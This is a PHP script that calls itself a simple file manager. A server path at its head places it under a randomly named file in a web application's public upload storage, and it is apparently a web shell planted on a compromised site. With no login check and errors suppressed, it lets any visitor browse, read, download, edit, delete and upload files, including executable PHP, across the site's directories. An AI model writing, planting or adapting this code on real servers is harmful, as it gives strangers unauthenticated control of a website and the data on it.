/var/www/html/back/storage/app/public/131/0dtbkq/i5sx3.php
<?php
// file_manager.php - Simple File Manager with Back Button
session_start();
error_reporting(0);
// ==================== CONFIGURATION ====================
$base_dir = realpath(__DIR__);
$root_anchor = dirname($base_dir);
// ==================== HELPER FUNCTIONS ====================
function sanitize_path($path){
$path = str_replace('..', '', $path);
$path = preg_replace('/[^a-zA-Z0-9\.\_\-\/]/', '', $path);
return trim($path, '/');
}
function safe_realpath_within($path, $allowed_root){
$rp = realpath($path);
if($rp === false) return false;
$root = rtrim($allowed_root, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
if(strpos($rp, $root) === 0 || $rp === rtrim($allowed_root, DIRECTORY_SEPARATOR)) {
return $rp;
}
return false;
}
function get_file_list($dir){
$files = [];
if(is_dir($dir)){
$items = scandir($dir);
foreach($items as $item){
if($item === '.' || $item === '..') continue;
$full_path = $dir . DIRECTORY_SEPARATOR . $item;
$files[] = [
'name' => $item,
'path' => $full_path,
'size' => is_file($full_path) ? filesize($full_path) : 0,
'type' => is_dir($full_path) ? 'directory' : 'file',
'modified' => date('Y-m-d H:i:s', filemtime($full_path))
];
}
}
return $files;
}
function format_size($bytes) {
if ($bytes >= 1073741824) {
return number_format($bytes / 1073741824, 2) . ' GB';
} elseif ($bytes >= 1048576) {
return number_format($bytes / 1048576, 2) . ' MB';
} elseif ($bytes >= 1024) {
return number_format($bytes / 1024, 2) . ' KB';
} else {
return $bytes . ' bytes';
}
}
// ==================== REQUESTED DIRECTORY HANDLING ====================
$requested_dir = isset($_GET['dir']) ? sanitize_path($_GET['dir']) : basename($base_dir);
$current_dir_candidate = $root_anchor . ($requested_dir ? DIRECTORY_SEPARATOR . $requested_dir : '');
$current_dir = safe_realpath_within($current_dir_candidate, $root_anchor);
if($current_dir === false){
$requested_dir = basename($base_dir);
$current_dir = safe_realpath_within($root_anchor . DIRECTORY_SEPARATOR . $requested_dir, $root_anchor);
if($current_dir === false){
$requested_dir = '';
$current_dir = safe_realpath_within($root_anchor, $root_anchor);
}
}
// ==================== PARENT DIRECTORY CALCULATION ====================
if($requested_dir !== ''){
$parent_dir = dirname($requested_dir);
if($parent_dir === '.' || $parent_dir === '\\') $parent_dir = '';
} else {
$parent_dir = '';
}
// ==================== BREADCRUMB ====================
$dir_parts = [];
if($requested_dir !== ''){
$parts = explode('/', $requested_dir);
$acc = '';
foreach($parts as $p){
if($p === '') continue;
$acc .= ($acc === '' ? '' : '/') . $p;
$dir_parts[] = ['name' => $p, 'path' => $acc];
}
}
// ==================== ACTION HANDLING ====================
$action = $_GET['action'] ?? 'list';
switch($action){
case 'view':
$file = sanitize_path($_GET['file'] ?? '');
$file_path = $current_dir . DIRECTORY_SEPARATOR . $file;
if(safe_realpath_within($file_path, $root_anchor) && is_file($file_path)){
header('Content-Type: text/plain');
readfile($file_path);
exit;
}
break;
case 'edit':
$file = sanitize_path($_GET['file'] ?? '');
$file_path = $current_dir . DIRECTORY_SEPARATOR . $file;
if($_SERVER['REQUEST_METHOD'] === 'POST'){
$content = $_POST['content'] ?? '';
if(safe_realpath_within($file_path, $root_anchor) && is_file($file_path)){
file_put_contents($file_path, $content);
}
header('Location: ?action=list&dir=' . urlencode($requested_dir));
exit;
}
if(safe_realpath_within($file_path, $root_anchor) && is_file($file_path)){
$content = htmlspecialchars(file_get_contents($file_path));
echo "<!DOCTYPE html><html><head><meta charset='utf-8'><title>Edit: ".htmlspecialchars($file)."</title></head><body>";
echo "<h2>✏️ Edit: ".htmlspecialchars($file)."</h2>";
echo "<form method='post'>";
echo "<textarea name='content' style='width:100%;height:400px;font-family:monospace;'>$content</textarea><br><br>";
echo "<button type='submit'>💾 Save</button> ";
echo "<a href='?action=list&dir=".urlencode($requested_dir)."'>🚫 Cancel</a>";
echo "</form></body></html>";
exit;
}
break;
case 'delete':
$file = sanitize_path($_GET['file'] ?? '');
$file_path = $current_dir . DIRECTORY_SEPARATOR . $file;
if(safe_realpath_within($file_path, $root_anchor) && file_exists($file_path)){
if(is_dir($file_path)){
$it = new RecursiveIteratorIterator(
new RecursiveDirectoryIterator($file_path, RecursiveDirectoryIterator::SKIP_DOTS),
RecursiveIteratorIterator::CHILD_FIRST
);
foreach($it as $f){
$f->isDir() ? rmdir($f->getRealPath()) : unlink($f->getRealPath());
}
rmdir($file_path);
} else {
unlink($file_path);
}
}
header('Location: ?action=list&dir=' . urlencode($requested_dir));
exit;
break;
case 'upload':
if(!empty($_FILES['file'])){
$uploaded = $_FILES['file'];
if($uploaded['error'] === UPLOAD_ERR_OK){
$name = basename($uploaded['name']);
$dest = $current_dir . DIRECTORY_SEPARATOR . $name;
if(safe_realpath_within(dirname($dest), $root_anchor)){
move_uploaded_file($uploaded['tmp_name'], $dest);
@chmod($dest, 0644);
}
}
}
header('Location: ?action=list&dir=' . urlencode($requested_dir));
exit;
break;
case 'download':
$file = sanitize_path($_GET['file'] ?? '');
$file_path = $current_dir . DIRECTORY_SEPARATOR . $file;
if(safe_realpath_within($file_path, $root_anchor) && is_file($file_path)){
header('Content-Description: File Transfer');
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="'.basename($file_path).'"');
header('Content-Length: '.filesize($file_path));
readfile($file_path);
exit;
}
break;
case 'create_folder':
if($_SERVER['REQUEST_METHOD'] === 'POST'){
$folder = sanitize_path($_POST['folder_name'] ?? '');
if($folder){
$fp = $current_dir . DIRECTORY_SEPARATOR . $folder;
if(safe_realpath_within(dirname($fp), $root_anchor) && !file_exists($fp)){
mkdir($fp, 0755, true);
}
}
}
header('Location: ?action=list&dir=' . urlencode($requested_dir));
exit;
break;
}
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>📁 File Manager</title>
<style>
* {
margin: 0;
padding: 0;
box-sizing: border-box;
}
body {
font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
background: linear-gradient(135deg, #667eea 0%, #764ba2 100%);
min-height: 100vh;
padding: 20px;
}
.container {
max-width: 1200px;
margin: 0 auto;
background: white;
border-radius: 15px;
box-shadow: 0 20px 40px rgba(0,0,0,0.1);
overflow: hidden;
}
.header {
background: linear-gradient(135deg, #2c3e50, #34495e);
color: white;
padding: 25px;
text-align: center;
}
.header h1 {
font-size: 2.2em;
margin-bottom: 10px;
font-weight: 300;
}
.current-path {
font-family: 'Courier New', monospace;
background: rgba(255,255,255,0.1);
padding: 10px;
border-radius: 8px;
margin: 15px 0;
word-break: break-all;
}
.navigation {
background: #ecf0f1;
padding: 20px;
border-bottom: 1px solid #bdc3c7;
}
.btn {
display: inline-flex;
align-items: center;
gap: 8px;
padding: 12px 20px;
background: #3498db;
color: white;
text-decoration: none;
border-radius: 8px;
font-weight: 500;
transition: all 0.3s ease;
border: none;
cursor: pointer;
font-size: 14px;
}
.btn:hover {
background: #2980b9;
transform: translateY(-2px);
box-shadow: 0 5px 15px rgba(0,0,0,0.2);
}
.btn-secondary {
background: #95a5a6;
}
.btn-secondary:hover {
background: #7f8c8d;
}
.btn-danger {
background: #e74c3c;
}
.btn-danger:hover {
background: #c0392b;
}
.btn-success {
background: #27ae60;
}
.btn-success:hover {
background: #219a52;
}
.toolbar {
display: flex;
gap: 15px;
flex-wrap: wrap;
margin-bottom: 20px;
}
.breadcrumb {
background: #f8f9fa;
padding: 15px 25px;
border-bottom: 1px solid #dee2e6;
}
.breadcrumb a {
color: #3498db;
text-decoration: none;
}
.breadcrumb span {
color: #7f8c8d;
margin: 0 8px;
}
.file-table {
width: 100%;
border-collapse: collapse;
}
.file-table th {
background: #34495e;
color: white;
padding: 15px;
text-align: left;
font-weight: 500;
}
.file-table td {
padding: 15px;
border-bottom: 1px solid #ecf0f1;
}
.file-table tr:hover {
background: #f8f9fa;
}
.file-icon {
width: 20px;
text-align: center;
margin-right: 10px;
}
.folder-row {
background: #f0f8ff;
}
.folder-row:hover {
background: #e3f2fd !important;
}
.action-buttons {
display: flex;
gap: 8px;
flex-wrap: wrap;
}
.empty-folder {
text-align: center;
padding: 60px 20px;
color: #7f8c8d;
}
.empty-folder i {
font-size: 3em;
margin-bottom: 20px;
display: block;
}
.upload-form, .folder-form {
display: flex;
gap: 10px;
align-items: center;
}
input[type="text"], input[type="file"] {
padding: 10px;
border: 1px solid #bdc3c7;
border-radius: 6px;
font-size: 14px;
}
input[type="text"] {
min-width: 200px;
}
@media (max-width: 768px) {
.toolbar {
flex-direction: column;
}
.upload-form, .folder-form {
flex-direction: column;
align-items: stretch;
}
.action-buttons {
flex-direction: column;
}
.btn {
justify-content: center;
}
}
</style>
</head>
<body>
<div class="container">
<div class="header">
<h1>📁 File Manager</h1>
<div class="current-path">
📍 <?= htmlspecialchars($current_dir) ?>
</div>
</div>
<div class="navigation">
<div class="toolbar">
<!-- Back Button -->
<a class="btn" href="?action=list&dir=<?= urlencode($parent_dir) ?>">
⬅️ Back
</a>
<!-- Home Button -->
<a class="btn btn-secondary" href="?action=list&dir=<?= urlencode(basename($base_dir)) ?>">
🏠 Project
</a>
<!-- Root Button -->
<a class="btn btn-secondary" href="?action=list&dir=">
📂 Root
</a>
<!-- Upload Form -->
<form method="post" enctype="multipart/form-data" action="?action=upload&dir=<?= urlencode($requested_dir) ?>" class="upload-form">
<input type="file" name="file" required>
<button class="btn btn-success" type="submit">📤 Upload</button>
</form>
<!-- Create Folder Form -->
<form method="post" action="?action=create_folder&dir=<?= urlencode($requested_dir) ?>" class="folder-form">
<input type="text" name="folder_name" placeholder="New Folder Name" required>
<button class="btn btn-success" type="submit">📁 Create Folder</button>
</form>
</div>
</div>
<div class="breadcrumb">
<a href="?action=list&dir=">Root</a>
<?php foreach($dir_parts as $p): ?>
<span>›</span>
<a href="?action=list&dir=<?= urlencode($p['path']) ?>"><?= htmlspecialchars($p['name']) ?></a>
<?php endforeach; ?>
</div>
<?php
$files = get_file_list($current_dir);
if(empty($files)):
?>
<div class="empty-folder">
<i>📭</i>
<h3>This folder is empty</h3>
<p>Upload files or create new folders to get started</p>
</div>
<?php else: ?>
<table class="file-table">
<thead>
<tr>
<th>Name</th>
<th>Type</th>
<th>Size</th>
<th>Modified</th>
<th>Actions</th>
</tr>
</thead>
<tbody>
<?php foreach($files as $f): ?>
<tr class="<?= $f['type'] === 'directory' ? 'folder-row' : '' ?>">
<td>
<span class="file-icon">
<?= $f['type'] === 'directory' ? '📁' : '📄' ?>
</span>
<?= htmlspecialchars($f['name']) ?>
</td>
<td><?= $f['type'] ?></td>
<td><?= $f['type'] === 'directory' ? '-' : format_size($f['size']) ?></td>
<td><?= $f['modified'] ?></td>
<td>
<div class="action-buttons">
<?php if($f['type'] === 'directory'):
$next_rel = ($requested_dir !== '' ? $requested_dir . '/' : '') . $f['name'];
?>
<a class="btn" href="?action=list&dir=<?= urlencode($next_rel) ?>">
📂 Open
</a>
<?php else: ?>
<a class="btn" href="?action=edit&file=<?= urlencode($f['name']) ?>&dir=<?= urlencode($requested_dir) ?>">
✏️ Edit
</a>
<a class="btn btn-secondary" href="?action=download&file=<?= urlencode($f['name']) ?>&dir=<?= urlencode($requested_dir) ?>">
📥 Download
</a>
<?php endif; ?>
<a class="btn btn-danger" href="?action=delete&file=<?= urlencode($f['name']) ?>&dir=<?= urlencode($requested_dir) ?>"
onclick="return confirm('Are you sure you want to delete <?= htmlspecialchars($f['name']) ?>?')">
🗑️ Delete
</a>
</div>
</td>
</tr>
<?php endforeach; ?>
</tbody>
</table>
<?php endif; ?>
</div>
<script>
// Add some interactive features
document.addEventListener('DOMContentLoaded', function() {
// Add confirmation for delete actions
const deleteLinks = document.querySelectorAll('a[href*="action=delete"]');
deleteLinks.forEach(link => {
link.addEventListener('click', function(e) {
if (!confirm('Are you sure you want to delete this item?')) {
e.preventDefault();
}
});
});
// Add hover effects
const rows = document.querySelectorAll('.file-table tr');
rows.forEach(row => {
row.addEventListener('mouseenter', function() {
this.style.transform = 'translateX(5px)';
this.style.transition = 'transform 0.2s ease';
});
row.addEventListener('mouseleave', function() {
this.style.transform = 'translateX(0)';
});
});
});
</script>
</body>
</html>